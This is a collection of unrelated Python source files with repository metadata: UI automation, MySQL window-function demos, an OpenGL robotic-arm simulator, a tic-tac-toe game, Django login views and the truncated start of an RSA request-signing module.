6dfe9a9eb9d0f25a55bccd22b66878bde1a2fd6b
|
refs/heads/master
| 2020-03-16T02:58:18.161981
| 2018-05-07T15:17:54
| 2018-05-07T15:17:54
| 132,477,192
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,280
|
py
|
import requests
from time import sleep
from UIAutomation.Utils import GetCardListFailureException, Action, parse_cfg, get_setting_configuration
from UIAutomation.Utils.HttpWrapper import get_request_post_head_parameters, eject_logged_user
import sys
__author__ = 'Yong_li'
__package__ = 'IscsUIAutomation'
"""
操作临时卡片请使用这个方法,只要输入你拥有的卡片名称就可以了.
"""
class CardCentralPage:
def __init__(self, driver, username, password, card_list_index):
"""
:param driver: Appium driver
:type driver:
:param username: cellphone number
:type username: str
:param password:
:type password:
:param token: 用户在登录卡片中心之前,先调用token, userid = eject_logged_user(mobile, password)方法得到token和ID用于获取卡片信息.
:type token:
:param userid:
:type userid:
"""
self.screen_shot_name = __name__
self.driver = driver
self.action = Action(driver)
self.username = username
self.password = password
self.card_list_index = card_list_index
def click_expected_card(self, card_name):
"""
如果想要点击自己期望的那个卡片,传入卡片的中文名字就可以了.
:param mobile:
:type mobile:
:param password:
:type password:
:param card_name:
:type card_name:
:return:
:rtype:
"""
position = self.get_card_position(card_name)
w, h = self.get_abs_width_height(position)
swip_times = self.swap_times(position)
if swip_times:
swip_times_int = int(swip_times)
for i in range(swip_times_int):
self.swipe_card()
self.driver.tap([(h, w)], 200)
# self.action.tap_driver([(w, h)], 1000)
def get_abs_width_height(self, position):
mobile_size = self.action.get_window_size()
width = mobile_size['width']
height = mobile_size['height']
w = 0
h = 0
sleep(5)
if position <= 6:
if position == 1:
h = 671 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if position == 2:
h = 671 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if position == 3:
h = 671 / 1280.0 * height
w = 612 / 752.0 * width
return h,w
if position == 4:
h = 1017 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if position == 5:
h = 1017 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if position == 6:
h = 1017 / 1280.0 * height
w = 612 / 752.0 * width
return h, w
if position > 6:
locator_number = (position - 6) % 9
if locator_number == 0:
raise ValueError
if locator_number == 1:
h = 325 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if locator_number == 2:
h = 325 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if locator_number == 3:
h = 325 / 1280.0 * height
w = 612 / 752.0 * width
return h, w
if locator_number == 4:
h = 671 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if locator_number == 5:
h = 671 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if locator_number == 6:
h = 671 / 1280.0 * height
w = 612 / 752.0 * width
return h, w
if locator_number == 7:
h = 1017 / 1280.0 * height
w = 138 / 752.0 * width
return h, w
if locator_number == 8:
h = 1017 / 1280.0 * height
w = 376 / 752.0 * width
return h, w
if locator_number == 9:
h = 1017 / 1280.0 * height
w = 612 / 752.0 * width
return h, w
else:
raise ValueError
def get_card_position(self, card_name):
# 系统发送post请求
try:
result = self.card_list_index
card_list = []
for r in result:
card_list.append(r['cardName'])
try:
position = card_list.index(card_name) + 1
# print card_list
except Exception as e:
print(e, 'Get Card List fail.')
raise GetCardListFailureException
return position
except Exception as e:
print(e)
@staticmethod
def __get_username_password():
"""
去获取使用哪个用户名和密码去进行接口操作
:return:
:rtype:
"""
setting = parse_cfg("setting", "cit_setting")
return setting['username'], setting['password'], setting['host']
def swipe_card(self):
width = self.action.get_window_size()['width']
height = self.action.get_window_size()['height']
if self.is_run_ios():
self.action.swipe(width * 5 / 7, height / 2, -(width * 3 / 7), height / 2, 200)
sleep(1)
else:
sleep(2)
self.action.swipe(0.9*width, 0.5*height, 0.1*width, 0.5*height, 250)
# self.action.swipe(width * 5 / 7, height / 2, -(width * 3 / 7), height / 2, 100)
# sleep(3)
pass
@staticmethod
def swap_times(position):
if position <=6:
return None
else:
swap_times = (position - 6) / 9 + 1
return swap_times
pass
def is_run_ios(self):
"""
判断当前运行的是否是IOS
:return:
"""
if sys.platform == "darwin":
return True
else:
return False
|
[
"649803977@qq.com"
] |
649803977@qq.com
|
abf6ebe4e73d775e29a7560d3f227e75a4f35eb4
|
a1504798a55d652c9c0705cc507fe2cb9678ea4f
|
/Adavnce_CRUD/MySQL_Window_Function/Window_Analytical_Function/MySQL_Analytical_Function.py
|
ee539c58a681592dda73205a29741e394fb1a83e
|
[] |
no_license
|
ritikapatel1410/Python_MySql
|
a4a952abd7b0394eafc071de0f55efd6a7a3b359
|
d90da25391243d5c08156a9184727c3e42e43517
|
refs/heads/main
| 2023-03-21T01:24:02.465879
| 2021-03-18T07:55:04
| 2021-03-18T07:55:04
| 347,563,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,610
|
py
|
'''
@Author: Ritika Patidar
@Date: 2021-03-18 00:30:10
@Last Modified by: Ritika Patidar
@Last Modified time: 2021-03-18 00:30:38
@Title : perform window analytical function on table
'''
import mysql.connector as mysql
import os
import sys
sys.path.insert(0,os.path.realpath("LogFile"))
import loggerfile
from decouple import config
class Analytical_Function:
"""
Description:
this class is define for show the functionality of Window Analytical Function
"""
def __init__(self):
self.mydb=mysql.connect(host=config('DB_HOST'),user=config('DB_USERNAME'),password=config('DB_PASSWORD'),database=config('DB_DATABASE'))
self.mycursor = self.mydb.cursor()
def NTILE_Function(self):
"""
Description:
this function is define for Ntile Function
Parameter:
None
Return:
None
"""
try:
print("================================ NTILE Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale,NTile(4) OVER() AS Total_Sales FROM Sales")
ntile = self.mycursor.fetchall()
for records in ntile:
print(records)
loggerfile.Logger("info","ntile fuction performed successfully")
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
def LEAD_Function(self):
"""
Description:
this function is define for LEAD function
Parameter:
None
Return:
None
"""
try:
print("================================ LEAD Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale,LEAD(Sale,1) OVER(ORDER BY Year) AS Total_Sales FROM Sales")
lead = self.mycursor.fetchall()
for records in lead:
print(records)
loggerfile.Logger("info","lead functions performed successfully")
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
def LAG_Function(self):
"""
Description:
this function is define for Lag Function
Parameter:
None
Return:
None
"""
try:
print("================================ Lag Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale,LAG(Sale,2) OVER(ORDER BY Year) AS Total_Sales FROM Sales")
percentage_rank=self.mycursor.fetchall()
for records in percentage_rank:
print(records)
loggerfile.Logger("info","Leg fuctions performed successfully".format(AVG))
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
def FIRST_VALUE_Function(self):
"""
Description:
this function is define for FIRST_VALUE Function
Parameter:
None
Return:
None
"""
try:
print("================================ First Value Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale, FIRST_VALUE(Product) OVER(PARTITION BY Year order by Sale desc) AS Total_Sales FROM Sales")
first_value=self.mycursor.fetchall()
for records in first_value:
print(records)
loggerfile.Logger("info","First value function performed successfully")
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
def LAST_VALUE_Function(self):
"""
Description:
this function is define for LAST_VALUE Function
Parameter:
None
Return:
None
"""
try:
print("================================ Last Value Function ===================================")
self.mycursor.execute("SELECT Year, Product, Sale, LAST_VALUE(Product) OVER(PARTITION BY Year order by Sale desc) AS Dume_Dist_Sale FROM Sales")
last_value=self.mycursor.fetchall()
for records in last_value:
print(records)
loggerfile.Logger("info","Last value performed successfully".format(Max))
except Exception as error:
loggerfile.Logger("error","{0} occured".format(error))
|
[
"patelrit1410@gmail.com"
] |
patelrit1410@gmail.com
|
49b11249c23e8b713d1e474589da61604eb9fe77
|
2b398353f5b0529ac666ef180e9dc966474a70c0
|
/vspk/v6/fetchers/nuingressauditacltemplates_fetcher.py
|
f794dbf0465235ffedeca8c1df72c25fb9c6b947
|
[
"BSD-3-Clause"
] |
permissive
|
nuagenetworks/vspk-python
|
e0c4570be81da2a4d8946299cb44eaf9559e0170
|
9a44d3015aa6424d0154c8c8a42297669cce11f9
|
refs/heads/master
| 2023-06-01T01:12:47.011489
| 2023-05-12T19:48:52
| 2023-05-12T19:48:52
| 53,171,411
| 21
| 18
|
BSD-3-Clause
| 2020-12-16T12:36:58
| 2016-03-04T23:10:58
|
Python
|
UTF-8
|
Python
| false
| false
| 2,212
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bambou import NURESTFetcher
class NUIngressAuditACLTemplatesFetcher(NURESTFetcher):
""" Represents a NUIngressAuditACLTemplates fetcher
Notes:
This fetcher enables to fetch NUIngressAuditACLTemplate objects.
See:
bambou.NURESTFetcher
"""
@classmethod
def managed_class(cls):
""" Return NUIngressAuditACLTemplate class that is managed.
Returns:
.NUIngressAuditACLTemplate: the managed class
"""
from .. import NUIngressAuditACLTemplate
return NUIngressAuditACLTemplate
|
[
"corentin.henry@nokia.com"
] |
corentin.henry@nokia.com
|
8681d350870b0cb4e9331a9d485552af8fa18ff0
|
648c206b68552f8d3250d4c6898245d2943e465e
|
/Simple_Sim.py
|
51d4f0dde98bccb5aac4b6043441bc6288d4c6cd
|
[] |
no_license
|
PAWAN-PRAJAPATI/robotic_arm_simulation
|
3a61d8b05a1541d6844cbb59a4130708ce858dac
|
cbdd8e7acf2cfdf54387097a68ce4a758ced58e7
|
refs/heads/master
| 2020-04-01T09:39:43.045401
| 2018-10-15T09:13:56
| 2018-10-15T09:13:56
| 153,084,551
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,128
|
py
|
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import socket
import sys
import math
import pygame
import pickle
import time
#from mpurecieverpi import myThread_R,myThread_S
'''
s1 = socket.socket()
s2 = socket.socket()
host = "127.0.0.1"
print(host)
port1 = int(sys.argv[1])
port2 = int(sys.argv[2])
s1.connect((host, port1))
s2.connect((host, port2))
#p1 elbow
#p2 shoulder
'''
#t = myThread_R()
#t1 = myThread_S()
class SimpleRobotArm:
def __init__(self):
self.angles=[90,0,225] #base shoulder elbow
self.config=[0,0] #(thetha,beta),(xy,zx)
self.anglstep=1
self.xyz=[0.5,0.2,0.05]
self.xyzstep=0.025
self.name = "Simple Robot Arm"
self.mode="reverse" # inverse reverse combat mouse
# thresholds = [[base_l,base_h],[shoulder........],[elbow........]]
self.thresh = [[-25, 200], [-30, 110], [190, 400]]
self.r_max=1.32
self.view="no_view"
self.golax=0
self.golay=0
self.pos_c=[0,0]
self.wheel_size=0.7
self.claw=self.wrist=0
self.host = "10.42.0.241"
self.s1=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.s2=None
def ret_ascii(self,i):
s = str(i)
ascii1 =int(s[0])+48
ascii2 =int(s[1])+48
return [ascii1,ascii2]
glClear(GL_COLOR_BUFFER_BIT)
def axis(self):
glBegin(GL_LINES)
glColor3f(0.3, 0.3, 0.3)
glVertex3f(-10.0, 0.0, 0.0)
glVertex3f(10.0, 0.0, 0.0)
glVertex3f(0.0, -10.0, 0.0)
glVertex3f(0.0, 10.0, 0.0)
glVertex3f(0.0, 0.0, -10.0)
glVertex3f(0.0, 0.0, 10.0)
glEnd()
biggest = 10
x = 88
y = 89
z = 90
r = range (0, (biggest + 1))
for i in r:
ascii = 48+i
# x axis positive
glRasterPos3f(i, 0.0, 0.0)
glColor3f(0.3, 0.3, 0.3)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, x)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# x axis negative
glRasterPos3f(-i, 0.0, 0.0)
glColor3f(0.5, 0.0, 0.0)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, x)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# y axis positive
glRasterPos3f(0.0, i, 0.0)
glColor3f(0.3, 0.3, 0.3)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, y)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# x axis negative
glRasterPos3f(0.0, -i, 0.0)
glColor3f(0.5, 0.0, 0.0)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, y)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# z axis positive
glRasterPos3f(0.0, 0.0, i)
glColor3f(0.3, 0.3, 0.3)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, z)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
# z axis negative
glRasterPos3f(0.0, 0.0, -i)
glColor3f(0.5, 0.0, 0.0)
if i == biggest:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, z)
else:
glutBitmapCharacter(GLUT_BITMAP_8_BY_13, ascii)
glFlush()
def run(self):
glutInit(sys.argv)
glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGB)
glutInitWindowSize(600, 800)
glutInitWindowPosition(100, 100)
glutCreateWindow(self.name)
glClearColor(0.0, 0.0, 0.0, 0.0)
glShadeModel(GL_FLAT)
glutDisplayFunc(self.display)
glutReshapeFunc(self.reshape)
#glutKeyboardUpFunc(self.keys_up)
glutKeyboardFunc(self.keys)
#glutJoystickFunc(self.joystick,1)
glutMainLoop()
def wheel(self,radius, height, num_slices):
r = radius
h = height
n = float(num_slices)
circle_pts = []
for i in range(int(n) + 1):
angle = 2 * math.pi * (i/n)
x = r * math.cos(angle)
y = r * math.sin(angle)
pt = (x, y)
circle_pts.append(pt)
glBegin(GL_TRIANGLE_FAN)#drawing the back circle
glColor(0, 0, 1)
glVertex(0, 0, h/2.0)
for (x, y) in circle_pts:
z = h/2.0
glVertex(x, y, z)
glEnd()
glBegin(GL_TRIANGLE_FAN)#drawing the front circle
glColor(0.25, 0.25, 0.25)
glVertex(0, 0, h/2.0)
for (x, y) in circle_pts:
z = -h/2.0
glVertex(x, y, z)
glEnd()
glBegin(GL_TRIANGLE_STRIP)#draw the tube
glColor4f(0.6, 0.6, 0.6, 1)
for (x, y) in circle_pts:
z = h/2.0
glVertex(x, y, z)
glVertex(x, y, -z)
glEnd()
def display(self):
try:
elb=t.run()
elb=elb.split(",")
self.angles[2]=int(elb[0])
except Exception as e:
#print(e)
pass
'''
try:
sho=(self.s2.recv(1024).decode())
sho=sho.split(",")
self.angles[1]=int(sho[0])
except Exception as e:
print(e)
pass
'''
#print("sho:",sho)
#print("elb:",elb)
glClear(GL_COLOR_BUFFER_BIT);
glPushMatrix();
glTranslatef(0, -2, -7);
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA);
glRotatef(self.golax, 0, 1, 0);
glRotatef(self.golay, 1, 0, 0);
glColor4f(0.0,0.0,1.0,1)
if(self.dis(self.xyz)>self.r_max):
glColor4f(1.0,0,0,0.5)
glDisable(GL_BLEND)
self.axis()
glColor4f(0,0.4,0.4,0.5)
glTranslatef(0, 0, 0);
#if(self.angles[0]>self.thresh[0][1]-20 or self.angles[0]<self.thresh[0][0]+20):
# glColor4f(1.0,0,0,0.5)
#bbb = self.angles[0] - 90
#glRotatef(bbb, 0, 1, 0);
glTranslatef(0, 0.0, 0.0);
glPushMatrix();
glScalef(10, 1, 5);
glutSolidCube(0.5)
glPopMatrix();
glTranslatef (-2, 0, -2);
self.wheel(self.wheel_size,self.wheel_size,20)
glTranslatef (4, 0, 4);
self.wheel(self.wheel_size,self.wheel_size,20)
glTranslatef (0, 0, -4);
self.wheel(self.wheel_size,self.wheel_size,20)
glTranslatef (-4, 0, 4);
self.wheel(self.wheel_size,self.wheel_size,20)
###
glColor4f(0,0,1,0.5)
glTranslatef(4.3, 0, -2);
glPushMatrix();
if(self.view=="view"):
glutWireSphere(3.14*1.8,25,25)
glPopMatrix();
#if(self.angles[0]>self.thresh[0][1]-20 or self.angles[0]<self.thresh[0][0]+20):
# glColor4f(1.0,0,0,0.5)
bbb = self.angles[0] - 90
glRotatef(bbb, 0, 1, 0);
glTranslatef(-2, 0.0, 0.0);
glPushMatrix();
glScalef(10, 1, 5);
glutWireCube(0.0)
glPopMatrix();
###
glColor4f(0.5,0.5,1.0,0.5)
glTranslatef(2.5,0,0);
#if(self.angles[1]>self.thresh[1][1]-20 or self.angles[1]<self.thresh[1][0]+20):
# glColor4f(1.0,0,0,0.5)
glRotatef(self.angles[1], 0, 0.0, 1);
glTranslatef(1, 0, 0.0);
glPushMatrix();
glScalef(2.0, 0.2, 0.5);
glutSolidCube(1.1);
glPopMatrix();
glColor4f(1,0.5,0.5,0.5)
glTranslatef(1.2, 0.0, 0.0);
if(self.angles[2]>self.thresh[2][1]-20 or self.angles[2]<self.thresh[2][0]+20):
glColor4f(1.0,0,0,0.5)
glRotatef(self.angles[2], 0.0, 0.0, 1.0);
glTranslatef(1.2, 0.0, 0.0);
glPushMatrix();
glScalef(2.0, 0.2, 0.5);
glutSolidCube(1.3);
glPopMatrix();
glColor4f(1,1,1,1)
glTranslatef(1.3, 0.0, 0.0);
glRotatef(self.wrist, 1, 0.0, 0);
glTranslatef(0, 0.0, 0.0);
glPushMatrix();
glScalef(0.1, 0.2, 0.5);
glutSolidCube(1.3);
glPopMatrix();
glColor4f(1,1,1,1)
glTranslatef(0, 0.0, -0.34);
glRotatef(self.claw, 0.0, 1, 0);
glBegin(GL_TRIANGLES)
glVertex3f(0.5, 0, -0.4)
glVertex3f(1,0, 0.0)
glVertex3f( 0,0, 0.0)
glEnd()
glRotatef(-self.claw, 0.0, 1, 0);
glColor4f(1,1,1,1)
glTranslatef(0, 0.0, 2*0.34);
glRotatef(0, 0.0, 1, 0);
glRotatef(-self.claw, 0.0, 1, 0);
#glRotatef(self.claw, 0.0, 1, 0);
glBegin(GL_TRIANGLES)
glVertex3f(0.5, 0, 0.4)
glVertex3f(1,0, 0.0)
glVertex3f( 0,0, 0.0)
glEnd()
glPopMatrix();
glutSwapBuffers();
glutPostRedisplay()
def reshape(self, w, h):
glViewport(0, 0, w, h)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(65.0, w / h, 1.0, 20.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glTranslatef(0.0, 0.0, -6.0)
def view_mode(self,keys):
if(keys=='4'.encode("utf-8")):
self.golax+=2
elif(keys=='6'.encode("utf-8")):
self.golax-=2
elif(keys=='8'.encode("utf-8")):
self.golay+=2
elif(keys=='5'.encode("utf-8")):
self.golay-=2
def apply(self,angles,xyz,angles_chg,xyz_chg):
self.angles[0]=(angles[0]+angles_chg[0])%360
self.angles[1]=(angles[1]+angles_chg[1])%360
self.angles[2]=(angles[2]+angles_chg[2])%360
self.xyz[0]=xyz[0]+xyz_chg[0]
self.xyz[1]=xyz[1]+xyz_chg[1]
self.xyz[2]=xyz[2]+xyz_chg[2]
def dis(self,xyz):
x,y,z=xyz
s=(x**2+y**2+z**2)**(1/2)
return (s)
def angle_check(self,angles):
if(self.thresh[0][0]<angles[0]<self.thresh[0][1] and self.thresh[1][0]<angles[1]<self.thresh[1][1] and
self.thresh[2][0]<angles[2]<self.thresh[2][1]):
return 1
return 0
def print_data(self):
#print("Mode:",self.mode)
#print("Angles:",self.angles)
print("Wrist:",self.wrist)
print("Claw:",self.claw)
def keys(self,*args):
#port1 = int(sys.argv[1])
#port2 = int(sys.argv[2])
keys=args[0]
if(keys=='1'.encode("utf-8")):
'''
try:
self.s1.close()
except Exception as e:
print(e)
pass
'''
#self.s1.connect((self.host, port1))
print("elbo connected!!!")
if(keys==2):
try:
self.s2.close();
except Exception as e:
print(e)
pass
self.s2 = socket.socket()
self.s2.connect((self.host, port2))
print("sho connected!!!")
if(keys=='v'.encode("utf-8")):
self.view="view"
elif(keys=='b'.encode("utf-8")):
self.view="no_view"
elif(keys=='C'.encode("utf-8")):
self.golay=0
self.golax=0
elif(keys=='+'.encode("utf-8")):
self.xyzstep+=0.025
elif(keys=='-'.encode("utf-8")):
self.xyzstep-=0.025
self.view_mode(keys)
if(keys=='q'.encode("utf-8")):
self.apply(self.angles,self.xyz,[self.anglstep,0,0],[0,0,0])
elif(keys=='a'.encode("utf-8")):
self.apply(self.angles,self.xyz,[-self.anglstep,0,0],[0,0,0])
if(keys=='w'.encode("utf-8")):
self.apply(self.angles,self.xyz,[0,self.anglstep,0],[0,0,0])
elif(keys=='s'.encode("utf-8")):
self.apply(self.angles,self.xyz,[0,-self.anglstep,0],[0,0,0])
if(keys=='e'.encode("utf-8")):
self.apply(self.angles,self.xyz,[0,0,self.anglstep],[0,0,0])
elif(keys=='d'.encode("utf-8")):
self.apply(self.angles,self.xyz,[0,0,-self.anglstep],[0,0,0])
if(keys=='t'.encode("utf-8") and self.claw<=6):
self.claw=self.claw+2
elif(keys=='g'.encode("utf-8") and self.claw>=-24):
self.claw=self.claw-2
if(keys=='r'.encode("utf-8")):
self.wrist=self.wrist+2
elif(keys=='f'.encode("utf-8")):
self.wrist=self.wrist-2
print(self.print_data())
glutPostRedisplay()
if __name__ == '__main__':
app = SimpleRobotArm()
#connect_arm()
app.run()
|
[
"prajapatipawan6464@gmail.com"
] |
prajapatipawan6464@gmail.com
|
6343dde6cb5f70eef3a21763abb40fab047ef166
|
7a11b6d4063685cb08b074ac8d08ab6e1d045ff5
|
/src/07_game_cross_nulls.py
|
36a888f67783bf3859b4aee3c5fb157a8f9dc7ed
|
[] |
no_license
|
slavaider/python
|
8a9f5769bd519e0e270c5814ef46ec5c653ab7c1
|
f98896b8e9dd93fe7d2b4a495b67704ef5f08373
|
refs/heads/master
| 2023-03-02T15:12:56.218871
| 2021-02-07T16:20:08
| 2021-02-07T16:20:32
| 301,493,207
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,745
|
py
|
import random
board = [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']
winning_combination = [(0, 1, 2), (3, 4, 5), (6, 7, 8),
(0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8), (2, 4, 6)]
def print_board(board_game):
for i, cell in enumerate(board_game):
if (i + 1) % 3 == 0:
print(cell)
else:
print(cell + '|', end='')
def get_winner(state, combination):
for x, y, z in combination:
if state[x] == state[y] and state[y] == state[z] and (state[x] == 'X' or state[x] == '0'):
return state[x]
elif state.count(' ') == 0:
return "-"
return ''
def play_game(board_game):
current_sign = 'X'
flag = True
while get_winner(board_game, winning_combination) == '':
if flag:
index = int(input(f'Введите номер клетки от 0 - 8. Куда вы хотите поставить {current_sign} : '))
flag = False
else:
while True:
index = random.randint(0, 8)
if board_game[index] == ' ':
break
print(f"Компьютер выбирает ход = {index}")
flag = True
if board_game[index] == ' ':
board_game[index] = current_sign
else:
flag = not flag
continue
print_board(board_game)
winner_sign = get_winner(board_game, winning_combination)
if winner_sign == "-":
print("Ничья")
break
if winner_sign != '':
print("Победитель " + winner_sign)
current_sign = 'X' if current_sign == '0' else '0'
if __name__ == '__main__':
play_game(board)
|
[
"slavaider1@gmail.com"
] |
slavaider1@gmail.com
|
9c76340c94481e9138c7f722b48734528aa02859
|
7775a073201f568022bbb4ed3d04cb1639ae5e65
|
/CCFA/apps/users/views.py
|
7bdb7efbf31d3ebfb78cf41dd277ed6bf50cd756
|
[] |
no_license
|
a289237642/rest-api
|
25db777fa1ca85fee77f86b8ae92d3656ce2ef40
|
fd2c70245cb12212dcd2fd8899f789c3e41d1af2
|
refs/heads/master
| 2020-04-24T14:12:13.312539
| 2019-03-14T08:41:27
| 2019-03-14T08:41:27
| 172,012,413
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,727
|
py
|
from django.shortcuts import render, redirect, reverse
from django.views import View
from .form import UserRegisterForm, UserLoginForm
from .models import UserProfile, Banner
from django.contrib.auth import authenticate, logout, login
# Create your views here.
class UserCenterView(View):
"""用户中心"""
def get(self, request):
return render(request, 'users/member.html')
def post(self, request):
pass
class UserLogoutView(View):
"""Logout"""
def get(self, request):
logout(request)
return redirect(reverse("index"))
class UserLoginView(View):
"""Login in"""
def get(self, request):
user_login_form = UserLoginForm()
return render(request, "users/login.html", {"user_login_form": user_login_form})
def post(self, request):
user_login_form = UserLoginForm(request.POST)
if user_login_form.is_valid():
username = user_login_form.cleaned_data["username"]
password = user_login_form.cleaned_data["password"]
a = authenticate(username=username, password=password)
if a:
login(request, a)
return redirect(reverse("index"))
else:
return render(request, 'users/login.html', {'msg': '用户名或者密码有误'})
else:
return render(request, 'users/login.html', {'msg': user_login_form})
class IndexView(View):
"""HomePage"""
def get(self, request):
all_banner = Banner.objects.all()[:3]
return render(request, 'index.html', {"all_banner": all_banner})
class UserRegisterView(View):
"""register"""
def get(self, request):
user_register_form = UserRegisterForm()
return render(request, 'users/user_register.html', {'user_register_form': user_register_form})
def post(self, request):
user_register_form = UserRegisterForm(request.POST)
if user_register_form.is_valid():
username = user_register_form.cleaned_data["username"]
password = user_register_form.cleaned_data["password"]
email = user_register_form.cleaned_data["email"]
user = UserProfile.objects.filter(username=username)
if user:
return render(request, 'users/user_register.html', {'msg': '用户已经存在'})
else:
a = UserProfile()
a.username = username
a.set_password(password)
a.email = email
a.save()
return redirect(reverse('users:user_login'))
else:
return render(request, 'users/user_register.html', {'user_register_form': user_register_form})
|
[
"a289237642@163.com"
] |
a289237642@163.com
|
856f695c8757308f24be27a30b4e71a3c6db1381
|
f1a426f778d74dc713561ff51e12744535d3188d
|
/210427/filter.py
|
247c5878f80f0bac5dcfedd96e6dc2c11a102430
|
[] |
no_license
|
bsu414/PythonPractice
|
1067492aa26b161ca32cd7e51b06cfe02ec502c0
|
c1c7644ae29a12980ddbcc3682858d59548e4496
|
refs/heads/main
| 2023-06-03T02:59:22.598267
| 2021-06-22T09:28:09
| 2021-06-22T09:28:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
def num(a):
return type(a) == int
a = [1, 'a', '가', 5, 9.99, -10]
print(filter(num, a))
print(list(filter(num, a)))
|
[
"S20026@gsm.hs.kr"
] |
S20026@gsm.hs.kr
|
4c2aaaca0cc571f1a02e61d450f73ac7d76a878b
|
3a891a79be468621aae43defd9a5516f9763f36e
|
/desktop/core/ext-py/navoptapi-0.1.0/altuscli/auth.py
|
8fdc3e0468251e9f5891fe857f75b62bead8e9f9
|
[
"Apache-2.0"
] |
permissive
|
oyorooms/hue
|
b53eb87f805063a90f957fd2e1733f21406269aa
|
4082346ef8d5e6a8365b05752be41186840dc868
|
refs/heads/master
| 2020-04-15T20:31:56.931218
| 2019-01-09T19:02:21
| 2019-01-09T19:05:36
| 164,998,117
| 4
| 2
|
Apache-2.0
| 2019-01-10T05:47:36
| 2019-01-10T05:47:36
| null |
UTF-8
|
Python
| false
| false
| 5,275
|
py
|
# Copyright 2012-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Modifications made by Cloudera are:
# Copyright (c) 2016 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from base64 import urlsafe_b64encode
from email.utils import formatdate
import logging
from altuscli.compat import json
from altuscli.compat import OrderedDict
from altuscli.compat import urlsplit
from altuscli.exceptions import NoCredentialsError
from asn1crypto import keys, pem
import rsa
LOG = logging.getLogger('altuscli.auth')
class BaseSigner(object):
def add_auth(self, request):
raise NotImplementedError("add_auth")
class RSAv1Auth(BaseSigner):
"""
RSA signing with a SHA-256 hash returning a base64 encoded signature.
"""
AUTH_METHOD_NAME = 'rsav1'
def __init__(self, credentials):
self.credentials = credentials
def _sign_string(self, string_to_sign):
try:
# We expect the private key to be the an PKCS8 pem formatted string.
pem_bytes = self.credentials.private_key.encode('utf-8')
if pem.detect(pem_bytes):
_, _, der_bytes = pem.unarmor(pem_bytes)
# In PKCS8 the key is wrapped in a container that describes it
